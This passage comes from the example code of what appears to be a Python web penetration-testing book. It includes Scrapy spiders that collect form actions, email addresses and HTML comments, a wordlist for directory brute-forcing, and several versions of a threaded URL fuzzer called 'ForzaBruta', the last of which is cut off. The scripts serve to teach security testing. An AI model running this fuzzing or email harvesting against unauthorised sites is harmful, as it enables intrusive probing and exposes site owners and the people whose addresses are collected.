57 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
58 | #EXTENSIONS = {
59 | # 'scrapy.telnet.TelnetConsole': None,
60 | #}
61 |
62 | # Configure item pipelines
63 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
64 | #ITEM_PIPELINES = {
65 | # 'basic_crawler.pipelines.SomePipeline': 300,
66 | #}
67 |
68 | # Enable and configure the AutoThrottle extension (disabled by default)
69 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html
70 | # NOTE: AutoThrottle will honour the standard settings for concurrency and delay
71 | #AUTOTHROTTLE_ENABLED=True
72 | # The initial download delay
73 | #AUTOTHROTTLE_START_DELAY=5
74 | # The maximum download delay to be set in case of high latencies
75 | #AUTOTHROTTLE_MAX_DELAY=60
76 | # Enable showing throttling stats for every response received:
77 | #AUTOTHROTTLE_DEBUG=False
78 |
79 | # Enable and configure HTTP caching (disabled by default)
80 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
81 | #HTTPCACHE_ENABLED=True
82 | #HTTPCACHE_EXPIRATION_SECS=0
83 | #HTTPCACHE_DIR='httpcache'
84 | #HTTPCACHE_IGNORE_HTTP_CODES=[]
85 | #HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
86 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/settings.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/__init__.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-base.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 |
6 |
7 | class MySpider(BaseSpider):
8 | name = "basic_crawler"
9 | allowed_domains = ['packtpub.com']
10 | start_urls = ["https://www.packtpub.com"]
11 |
12 | def parse(self, response):
13 | hxs = Selector(response)
14 |
15 | #CODE for scraping book titles
16 | book_titles = hxs.xpath('//div[@class="book-block-title"]/text()').extract()
17 | for title in book_titles:
18 | book = BasicCrawlerItem()
19 | book["title"] = title
20 | yield book
21 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-base.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/spiderman-base.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-c.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
8 | class MySpider(BaseSpider):
9 | name = "basic_crawler"
10 | allowed_domains = ['packtpub.com']
11 | start_urls = ["https://www.packtpub.com"]
12 |
13 | def parse(self, response):
14 | hxs = Selector(response)
15 |
16 | #CODE for scraping book titles
17 | #book_titles = hxs.xpath('//div[@class="book-block-title"]/text()').extract()
18 | #for title in book_titles:
19 | # book = NinjaCrawlerItem()
20 | # book["title"] = title
21 | # book["location_url"] = response.url
22 | # yield book
23 |
24 |
25 | #CODE for scraping Forms
26 | forms = hxs.xpath('//form/@action').extract()
27 | for form in forms:
28 | formy = BasicCrawlerItem()
29 | formy["form"] = form
30 | formy["location_url"] = response.url
31 | yield formy
32 |
33 | #CODE for scraping emails
34 | emails = hxs.xpath("//*[contains(text(),'@')]").extract()
35 | for email in emails:
36 | com = BasicCrawlerItem()
37 | com["email"] = email
38 | com["location_url"] = response.url
39 | yield com
40 |
41 |
42 | #CODE for scraping comments
43 | comments = hxs.xpath('//comment()').extract()
44 | for comment in comments:
45 | com = BasicCrawlerItem()
46 | com["comments"] = comment
47 | com["location_url"] = response.url
48 | yield com
49 |
50 | visited_links=[]
51 | links = hxs.xpath('//a/@href').extract()
52 | link_validator= re.compile("^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")
53 |
54 | for link in links:
55 | if link_validator.match(link) and not link in visited_links:
56 | visited_links.append(link)
57 | yield Request(link, self.parse)
58 | else:
59 | full_url=response.urljoin(link)
60 | visited_links.append(full_url)
61 | yield Request(full_url, self.parse)
62 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-recursive.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
8 | class MySpider(BaseSpider):
9 | name = "basic_crawler"
10 | allowed_domains = ['packtpub.com']
11 | start_urls = ["https://www.packtpub.com"]
12 |
13 | def parse(self, response):
14 | hxs = Selector(response)
15 |
16 | #CODE for scraping book titles
17 | book_titles = hxs.xpath('//div[@class="book-block-title"]/text()').extract()
18 | for title in book_titles:
19 | book = BasicCrawlerItem()
20 | book["title"] = title
21 | yield book
22 |
23 |
24 | visited_links=[]
25 | links = hxs.xpath('//a/@href').extract()
26 | link_validator= re.compile("^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")
27 |
28 |
29 |
30 | for link in links:
31 | if link_validator.match(link) and not link in visited_links:
32 | visited_links.append(link)
33 | yield Request(link, self.parse)
34 | else:
35 | full_url=response.urljoin(link)
36 | visited_links.append(full_url)
37 | yield Request(full_url, self.parse)
38 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-recursive.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/spiderman-recursive.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
8 | class MySpider(BaseSpider):
9 | name = "basic_crawler"
10 | allowed_domains = ['packtpub.com']
11 | start_urls = ["https://www.packtpub.com"]
12 |
13 | def parse(self, response):
14 | hxs = Selector(response)
15 |
16 | #CODE for scraping book titles
17 | book_titles = hxs.xpath('//div[@class="book-block-title"]/text()').extract()
18 | for title in book_titles:
19 | book = BasicCrawlerItem()
20 | book["title"] = title
21 | yield book
22 |
23 |
24 | visited_links=[]
25 | links = hxs.xpath('//a/@href').extract()
26 | link_validator= re.compile("^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")
27 |
28 |
29 |
30 | for link in links:
31 | if link_validator.match(link) and not link in visited_links:
32 | visited_links.append(link)
33 | yield Request(link, self.parse)
34 | else:
35 | full_url=response.urljoin(link)
36 | visited_links.append(full_url)
37 | yield Request(full_url, self.parse)
38 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/spiderman.pyc
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/common.txt:
--------------------------------------------------------------------------------
1 | wfuzz
2 | test
3 | robots.txt
4 | about.php
5 | redir.php
6 | test1.txt
7 | test2.txt
8 | admin
9 | Admin
10 | index.php
11 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/commons.txt:
--------------------------------------------------------------------------------
1 | e
2 | 00
3 | 01
4 | 02
5 | 03
6 | 1
7 | 10
8 | 100
9 | 1000
10 | 123
11 | 2
12 | 20
13 | 200
14 | 2000
15 | 2001
16 | 2002
17 | 2003
18 | 2004
19 | 2005
20 | 3
21 | @
22 | Admin
23 | Administration
24 | crm
25 | CVS
26 | CYBERDOCS
27 | CYBERDOCS25
28 | CYBERDOCS31
29 | INSTALL_admin
30 | Log
31 | Logs
32 | Pages
33 | Servlet
34 | Servlets
35 | SiteServer
36 | Sources
37 | Statistics
38 | Stats
39 | W3SVC
40 | W3SVC1
41 | W3SVC2
42 | W3SVC3
43 | WEB-INF
44 | _admin
45 | _pages
46 | a
47 | aa
48 | aaa
49 | abc
50 | about
51 | academic
52 | access
53 | accessgranted
54 | account
55 | accounting
56 | action
57 | actions
58 | active
59 | adm
60 | admin
61 | admin_
62 | admin_login
63 | admin_logon
64 | administrat
65 | administration
66 | administrator
67 | adminlogin
68 | adminlogon
69 | adminsql
70 | admon
71 | adsl
72 | agent
73 | agents
74 | alias
75 | aliases
76 | all
77 | alpha
78 | analog
79 | analyse
80 | announcements
81 | answer
82 | any
83 | apache
84 | api
85 | app
86 | applet
87 | applets
88 | appliance
89 | application
90 | applications
91 | apply
92 | apps
93 | archive
94 | archives
95 | arrow
96 | asp
97 | aspadmin
98 | assets
99 | attach
100 | attachments
101 | audit
102 | auth
103 | auto
104 | automatic
105 | b
106 | back
107 | back-up
108 | backdoor
109 | backend
110 | backoffice
111 | backup
112 | backups
113 | bak
114 | bak-up
115 | bakup
116 | bank
117 | banks
118 | banner
119 | banners
120 | base
121 | basic
122 | bass
123 | batch
124 | bd
125 | bdata
126 | bea
127 | bean
128 | beans
129 | beta
130 | bill
131 | billing
132 | bin
133 | binaries
134 | biz
135 | blog
136 | blow
137 | board
138 | boards
139 | body
140 | boot
141 | bot
142 | bots
143 | box
144 | boxes
145 | broken
146 | bsd
147 | bug
148 | bugs
149 | build
150 | builder
151 | bulk
152 | business
153 | buttons
154 | c
155 | cache
156 | cachemgr
157 | cad
158 | can
159 | captcha
160 | car
161 | card
162 | cardinal
163 | cards
164 | carpet
165 | cart
166 | cas
167 | cat
168 | catalog
169 | catalogs
170 | catch
171 | cc
172 | ccs
173 | cd
174 | cdrom
175 | cert
176 | certenroll
177 | certificate
178 | certificates
179 | certs
180 | cfdocs
181 | cfg
182 | cgi
183 | cgi-bin
184 | cgi-win
185 | cgibin
186 | chan
187 | change
188 | changepw
189 | channel
190 | chart
191 | chat
192 | class
193 | classes
194 | classic
195 | classified
196 | classifieds
197 | client
198 | clients
199 | cluster
200 | cm
201 | cmd
202 | code
203 | coffee
204 | coke
205 | command
206 | commerce
207 | commercial
208 | common
209 | component
210 | compose
211 | composer
212 | compressed
213 | comunicator
214 | con
215 | config
216 | configs
217 | configuration
218 | configure
219 | connect
220 | connections
221 | console
222 | constant
223 | constants
224 | contact
225 | contacts
226 | content
227 | contents
228 | control
229 | controller
230 | controlpanel
231 | controls
232 | corba
233 | core
234 | corporate
235 | count
236 | counter
237 | cpanel
238 | create
239 | creation
240 | credit
241 | creditcards
242 | cron
243 | crs
244 | css
245 | customer
246 | customers
247 | customize
248 | cv
249 | cvs
250 | d
251 | daemon
252 | dat
253 | data
254 | database
255 | databases
256 | dav
257 | db
258 | dba
259 | dbase
260 | dbm
261 | dbms
262 | debug
263 | default
264 | delete
265 | deletion
266 | demo
267 | demos
268 | deny
269 | deploy
270 | deployment
271 | design
272 | details
273 | dev
274 | dev60cgi
275 | devel
276 | develop
277 | developement
278 | developers
279 | development
280 | device
281 | devices
282 | devs
283 | diag
284 | dial
285 | dig
286 | dir
287 | directory
288 | discovery
289 | disk
290 | dispatch
291 | dispatcher
292 | dms
293 | dns
294 | doc
295 | docs
296 | docs41
297 | docs51
298 | document
299 | documents
300 | down
301 | download
302 | downloads
303 | draft
304 | dragon
305 | dratfs
306 | driver
307 | dump
308 | dumpenv
309 | e
310 | easy
311 | ebriefs
312 | echannel
313 | ecommerce
314 | edit
315 | editor
316 | element
317 | elements
318 | email
319 | employee
320 | employees
321 | en
322 | eng
323 | engine
324 | english
325 | enterprise
326 | env
327 | environ
328 | environment
329 | error
330 | errors
331 | es
332 | esales
333 | esp
334 | established
335 | esupport
336 | etc
337 | event
338 | events
339 | example
340 | examples
341 | exchange
342 | exe
343 | exec
344 | executable
345 | executables
346 | explorer
347 | export
348 | external
349 | extra
350 | Extranet
351 | extranet
352 | fail
353 | failed
354 | fcgi-bin
355 | feedback
356 | field
357 | file
358 | files
359 | filter
360 | firewall
361 | first
362 | flash
363 | folder
364 | foo
365 | forget
366 | forgot
367 | forgotten
368 | form
369 | format
370 | formhandler
371 | formsend
372 | formupdate
373 | fortune
374 | forum
375 | forums
376 | frame
377 | framework
378 | ftp
379 | fun
380 | function
381 | functions
382 | games
383 | gate
384 | generic
385 | gest
386 | get
387 | global
388 | globalnav
389 | globals
390 | gone
391 | gp
392 | gpapp
393 | granted
394 | graphics
395 | group
396 | groups
397 | guest
398 | guestbook
399 | guests
400 | hack
401 | hacker
402 | handler
403 | hanlder
404 | happening
405 | head
406 | header
407 | headers
408 | hello
409 | helloworld
410 | help
411 | hidden
412 | hide
413 | history
414 | hits
415 | home
416 | homepage
417 | homes
418 | homework
419 | host
420 | hosts
421 | htdocs
422 | htm
423 | html
424 | htmls
425 | ibm
426 | icons
427 | idbc
428 | iis
429 | images
430 | img
431 | import
432 | inbox
433 | inc
434 | include
435 | includes
436 | incoming
437 | incs
438 | index
439 | index2
440 | index_adm
441 | index_admin
442 | indexes
443 | info
444 | information
445 | ingres
446 | ingress
447 | ini
448 | init
449 | input
450 | install
451 | installation
452 | interactive
453 | internal
454 | internet
455 | intranet
456 | intro
457 | inventory
458 | invitation
459 | invite
460 | ipp
461 | ips
462 | j
463 | java
464 | java-sys
465 | javascript
466 | jdbc
467 | job
468 | join
469 | jrun
470 | js
471 | jsp
472 | jsps
473 | jsr
474 | keep
475 | kept
476 | kernel
477 | key
478 | lab
479 | labs
480 | launch
481 | launchpage
482 | ldap
483 | left
484 | level
485 | lib
486 | libraries
487 | library
488 | libs
489 | link
490 | links
491 | linux
492 | list
493 | load
494 | loader
495 | lock
496 | lockout
497 | log
498 | logfile
499 | logfiles
500 | logger
501 | logging
502 | login
503 | logo
504 | logon
505 | logout
506 | logs
507 | lost%2Bfound
508 | ls
509 | magic
510 | mail
511 | mailbox
512 | maillist
513 | main
514 | maint
515 | makefile
516 | man
517 | manage
518 | management
519 | manager
520 | manual
521 | map
522 | market
523 | marketing
524 | master
525 | mbo
526 | mdb
527 | me
528 | member
529 | members
530 | memory
531 | menu
532 | message
533 | messages
534 | messaging
535 | meta
536 | metabase
537 | mgr
538 | mine
539 | minimum
540 | mirror
541 | mirrors
542 | misc
543 | mkstats
544 | model
545 | modem
546 | module
547 | modules
548 | monitor
549 | mount
550 | mp3
551 | mp3s
552 | mqseries
553 | mrtg
554 | ms
555 | ms-sql
556 | msql
557 | mssql
558 | music
559 | my
560 | my-sql
561 | mysql
562 | names
563 | navigation
564 | ne
565 | net
566 | netscape
567 | netstat
568 | network
569 | new
570 | news
571 | next
572 | nl
573 | nobody
574 | notes
575 | novell
576 | nul
577 | null
578 | number
579 | object
580 | objects
581 | odbc
582 | of
583 | off
584 | office
585 | ogl
586 | old
587 | oldie
588 | on
589 | online
590 | open
591 | openapp
592 | openfile
593 | operator
594 | oracle
595 | oradata
596 | order
597 | orders
598 | outgoing
599 | output
600 | pad
601 | page
602 | pages
603 | pam
604 | panel
605 | paper
606 | papers
607 | pass
608 | passes
609 | passw
610 | passwd
611 | passwor
612 | password
613 | passwords
614 | path
615 | pdf
616 | perl
617 | perl5
618 | personal
619 | personals
620 | pgsql
621 | phone
622 | php
623 | phpMyAdmin
624 | phpmyadmin
625 | pics
626 | ping
627 | pix
628 | pl
629 | pls
630 | plx
631 | pol
632 | policy
633 | poll
634 | pop
635 | portal
636 | portlet
637 | portlets
638 | post
639 | postgres
640 | power
641 | press
642 | preview
643 | print
644 | printenv
645 | priv
646 | private
647 | privs
648 | process
649 | processform
650 | prod
651 | production
652 | products
653 | professor
654 | profile
655 | program
656 | project
657 | proof
658 | properties
659 | protect
660 | protected
661 | proxy
662 | ps
663 | pub
664 | public
665 | publish
666 | publisher
667 | purchase
668 | purchases
669 | put
670 | pw
671 | pwd
672 | python
673 | query
674 | queries
675 | queue
676 | quote
677 | ramon
678 | random
679 | rank
680 | rcs
681 | readme
682 | redir
683 | redirect
684 | reference
685 | references
686 | reg
687 | reginternal
688 | regional
689 | register
690 | registered
691 | release
692 | remind
693 | reminder
694 | remote
695 | removed
696 | report
697 | reports
698 | requisite
699 | research
700 | reseller
701 | resource
702 | resources
703 | responder
704 | restricted
705 | retail
706 | right
707 | robot
708 | robots.txt
709 | robotics
710 | root
711 | route
712 | router
713 | rpc
714 | rss
715 | rules
716 | run
717 | sales
718 | sample
719 | samples
720 | save
721 | saved
722 | schema
723 | scr
724 | scratc
725 | script
726 | scripts
727 | sdk
728 | search
729 | secret
730 | secrets
731 | section
732 | sections
733 | secure
734 | secured
735 | security
736 | select
737 | sell
738 | send
739 | sendmail
740 | sensepost
741 | sensor
742 | sent
743 | server
744 | server_stats
745 | servers
746 | service
747 | services
748 | servlet
749 | servlets
750 | session
751 | sessions
752 | set
753 | setting
754 | settings
755 | setup
756 | share
757 | shared
758 | shell
759 | shit
760 | shop
761 | shopper
762 | show
763 | showcode
764 | shtml
765 | sign
766 | signature
767 | signin
768 | simple
769 | single
770 | site
771 | sites
772 | sitemap
773 | sites
774 | small
775 | snoop
776 | soap
777 | soapdocs
778 | software
779 | solaris
780 | solutions
781 | somebody
782 | source
783 | sources
784 | spain
785 | spanish
786 | sql
787 | sqladmin
788 | src
789 | srchad
790 | srv
791 | ssi
792 | ssl
793 | staff
794 | start
795 | startpage
796 | stat
797 | statistic
798 | statistics
799 | stats
800 | status
801 | stop
802 | store
803 | story
804 | string
805 | student
806 | stuff
807 | style
808 | stylesheet
809 | stylesheets
810 | submit
811 | submitter
812 | sun
813 | super
814 | support
815 | supported
816 | survey
817 | svc
818 | svn
819 | svr
820 | sw
821 | sys
822 | sysadmin
823 | system
824 | table
825 | tag
826 | tape
827 | tar
828 | target
829 | tech
830 | temp
831 | template
832 | templates
833 | temporal
834 | temps
835 | terminal
836 | test
837 | testing
838 | tests
839 | text
840 | texts
841 | ticket
842 | tmp
843 | today
844 | tool
845 | toolbar
846 | tools
847 | top
848 | topics
849 | tour
850 | tpv
851 | trace
852 | traffic
853 | transaction
854 | transactions
855 | transfer
856 | transport
857 | trap
858 | trash
859 | tree
860 | trees
861 | tutorial
862 | uddi
863 | uninstall
864 | unix
865 | up
866 | update
867 | updates
868 | upload
869 | uploader
870 | uploads
871 | usage
872 | user
873 | users
874 | usr
875 | ustats
876 | util
877 | utilities
878 | utility
879 | utils
880 | validation
881 | validatior
882 | vap
883 | var
884 | vb
885 | vbs
886 | vbscript
887 | vbscripts
888 | vfs
889 | view
890 | viewer
891 | views
892 | virtual
893 | visitor
894 | vpn
895 | w
896 | w3
897 | w3c
898 | warez
899 | wdav
900 | web
901 | webaccess
902 | webadmin
903 | webapp
904 | webboard
905 | webcart
906 | webdata
907 | webdav
908 | webdist
909 | webhits
910 | weblog
911 | weblogic
912 | weblogs
913 | webmail
914 | webmaster
915 | webservice
916 | webservices
917 | websearch
918 | website
919 | webstat
920 | webstats
921 | webvpn
922 | welcome
923 | wellcome
924 | whatever
925 | whatnot
926 | whois
927 | wiki
928 | will
929 | win
930 | windows
931 | word
932 | work
933 | workplace
934 | workshop
935 | ws
936 | wstats
937 | wusage
938 | www
939 | wwwboard
940 | wwwjoin
941 | wwwlog
942 | wwwstats
943 | xcache
944 | xfer
945 | xml
946 | xmlrpc
947 | xsl
948 | xsql
949 | xyz
950 | zap
951 | zip
952 | zipfiles
953 | zips
954 | test1.txt
955 | test2.txt
956 | redir.php
957 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-2.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | from termcolor import colored
8 |
9 |
10 |
11 | def banner():
12 | print "\n***************************************"
13 | print "* ForzaBruta 0.2*"
14 | print "***************************************"
15 |
16 |
17 | def usage():
18 | print "Usage:"
19 | print " -w: url (http://somesite.com/FUZZ)"
20 | print " -t: threads"
21 | print " -f: dictionary file"
22 | print " -c: filter by status code"
23 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
24 |
25 |
26 | class request_performer(Thread):
27 | def __init__(self, word, url,hidecode):
28 | Thread.__init__(self)
29 | try:
30 | self.word = word.split("\n")[0]
31 | self.urly = url.replace('FUZZ', self.word)
32 | self.url = self.urly
33 | self.hidecode = hidecode
34 | except Exception, e:
35 | print e
36 |
37 | def run(self):
38 | try:
39 | r = requests.get(self.url)
40 | lines = str(r.content.count("\n"))
41 | chars = str(len(r._content))
42 | words = str(len(re.findall("\S+", r.content)))
43 | code = str(r.status_code)
44 | if self.hidecode != code:
45 | if '200' <= code < '300':
46 | print colored(code,'green') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
47 | elif '400' <= code < '500':
48 | print colored(code,'red') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
49 | elif '300' <= code < '400':
50 | print colored(code,'blue') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
51 | else:
52 | print colored(code,'yellow') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
53 |
54 | else:
55 | pass
56 | i[0] = i[0] - 1 # Here we remove one thread from the counter
57 | except Exception, e:
58 | print e
59 |
60 |
61 | def start(argv):
62 | banner()
63 | if len(sys.argv) < 5:
64 | usage()
65 | sys.exit()
66 | try:
67 | opts, args = getopt.getopt(argv, "w:f:t:c:")
68 | except getopt.GetoptError:
69 | print "Error en arguments"
70 | sys.exit()
71 | hidecode = 000
72 | for opt, arg in opts:
73 | if opt == '-w':
74 | url = arg
75 | elif opt == '-f':
76 | dict = arg
77 | elif opt == '-t':
78 | threads = arg
79 | elif opt == '-c':
80 | hidecode = arg
81 | try:
82 | f = open(dict, "r")
83 | words = f.readlines()
84 | except:
85 | print"Failed opening file: " + dict + "\n"
86 | sys.exit()
87 | launcher_thread(words, threads, url,hidecode)
88 |
89 |
90 | def launcher_thread(names, th, url,hidecode):
91 | global i
92 | i = []
93 | i.append(0)
94 | print "-------------------------------------------------------------------------------------------------------------"
95 | print "Code" + "\t\tchars\t\twords\t\tlines\t\tURL"
96 | print "-------------------------------------------------------------------------------------------------------------"
97 | while len(names):
98 | try:
99 | if i[0] < th:
100 | n = names.pop(0)
101 | i[0] = i[0] + 1
102 | thread = request_performer(n, url,hidecode)
103 | thread.start()
104 |
105 | except KeyboardInterrupt:
106 | print "ForzaBruta interrupted by user. Finishing attack.."
107 | sys.exit()
108 | thread.join()
109 | return
110 |
111 |
112 | if __name__ == "__main__":
113 | try:
114 | start(sys.argv[1:])
115 | except KeyboardInterrupt:
116 | print "ForzaBruta interrupted by user, killing all threads..!!"
117 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-3.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 |
8 | import md5
9 | from termcolor import colored
10 |
11 |
12 | def banner():
13 | print "\n***************************************"
14 | print "* ForzaBruta 0.3*"
15 | print "***************************************"
16 |
17 |
18 | def usage():
19 | print "Usage:"
20 | print " -w: url (http://somesite.com/FUZZ)"
21 | print " -t: threads"
22 | print " -f: dictionary file\n"
23 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
24 |
25 |
26 | class request_performer(Thread):
27 | def __init__(self, word, url,hidecode):
28 | Thread.__init__(self)
29 | try:
30 | self.word = word.split("\n")[0]
31 | self.urly = url.replace('FUZZ', self.word)
32 | self.url = self.urly
33 | self.hidecode = hidecode
34 | except Exception, e:
35 | print e
36 |
37 | def run(self):
38 | try:
39 | start = time.time()
40 | r = requests.get(self.url)
41 | elaptime = time.time()
42 | totaltime = str(elaptime - start)
43 | lines = str(r.content.count("\n"))
44 | chars = str(len(r._content))
45 | words = str(len(re.findall("\S+", r.content)))
46 | code = str(r.status_code)
47 | hash = md5.new(r.content).hexdigest()
48 |
49 | if r.history != []:
50 | first = r.history[0]
51 | code = str(first.status_code)
52 | else:
53 | pass
54 | if self.hidecode != code:
55 | if '200' <= code < '300':
56 | print totaltime + " \t" + colored(code,'green') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t"+ self.word
57 | elif '400' <= code < '500':
58 | print totaltime + " \t" + colored(code,'red') + "\t" + chars + " \t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
59 | elif '300' <= code < '400':
60 | print totaltime + " \t" + colored(code,'blue') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
61 | else:
62 | pass
63 | i[0] = i[0] - 1 # Here we remove one thread from the counter
64 | except Exception, e:
65 | print e
66 |
67 |
68 | def start(argv):
69 | banner()
70 | if len(sys.argv) < 5:
71 | usage()
72 | sys.exit()
73 | try:
74 | opts, args = getopt.getopt(argv, "w:f:t:c:")
75 | except getopt.GetoptError:
76 | print "Error en arguments"
77 | sys.exit()
78 | hidecode = 000
79 | for opt, arg in opts:
80 | if opt == '-w':
81 | url = arg
82 | elif opt == '-f':
83 | dict = arg
84 | elif opt == '-t':
85 | threads = arg
86 | elif opt == '-c':
87 | hidecode = arg
88 | try:
89 | f = open(dict, "r")
90 | words = f.readlines()
91 | except:
92 | print"Failed opening file: " + dict + "\n"
93 | sys.exit()
94 | launcher_thread(words, threads, url, hidecode)
95 |
96 |
97 | def launcher_thread(names, th, url, hidecode):
98 | global i
99 | i = []
100 | resultlist = []
101 | i.append(0)
102 | print "-------------------------------------------------------------------------------------------------------------"
103 | print "Time" + "\t\t\t" + "Code" + "\tChars \t Words \tLines \t MD5 \t\t\t\t\t String"
104 | print "-------------------------------------------------------------------------------------------------------------"
105 | while len(names):
106 | try:
107 | if i[0] < th:
108 | n = names.pop(0)
109 | i[0] = i[0] + 1
110 | thread = request_performer(n, url,hidecode)
111 | thread.start()
112 |
113 | except KeyboardInterrupt:
114 | print "ForzaBruta interrupted by user. Finishing attack.."
115 | sys.exit()
116 | thread.join()
117 | return
118 |
119 |
120 | if __name__ == "__main__":
121 | try:
122 | start(sys.argv[1:])
123 | except KeyboardInterrupt:
124 | print "ForzaBruta interrupted by user, killing all threads..!!"
125 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-4.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | import md5
8 | from termcolor import colored
9 |
10 | from selenium import webdriver
11 | from selenium.webdriver.common.keys import Keys
12 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
13 |
14 |
15 | def banner():
16 | print "\n***************************************"
17 | print "* ForzaBruta 0.3*"
18 | print "***************************************"
19 |
20 |
21 | def usage():
22 | print "Usage:"
23 | print " -w: url (http://somesite.com/FUZZ)"
24 | print " -t: threads"
25 | print " -f: dictionary file\n"
26 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
27 |
28 |
29 | class request_performer(Thread):
30 | def __init__(self, word, url,hidecode):
31 | Thread.__init__(self)
32 | try:
33 | self.word = word.split("\n")[0]
34 | self.urly = url.replace('FUZZ', self.word)
35 | self.url = self.urly
36 | self.hidecode = hidecode
37 | except Exception, e:
38 | print e
39 |
40 | def run(self):
41 | try:
42 | start = time.time()
43 | r = requests.get(self.url)
44 | elaptime = time.time()
45 | totaltime = str(elaptime - start)
46 | lines = str(r.content.count("\n"))
47 | chars = str(len(r._content))
48 | words = str(len(re.findall("\S+", r.content)))
49 | code = str(r.status_code)
50 | hash = md5.new(r.content).hexdigest()
51 |
52 | if r.history != []:
53 | first = r.history[0]
54 | code = str(first.status_code)
55 | else:
56 | pass
57 | if self.hidecode != code:
58 | if '200' <= code < '300':
59 | dcap = dict(DesiredCapabilities.PHANTOMJS)
60 | driver = webdriver.PhantomJS(desired_capabilities=dcap)
61 | time.sleep(2)
62 | driver.set_window_size(1024, 768)
63 | driver.get(self.url)
64 | driver.save_screenshot(self.word+".png")
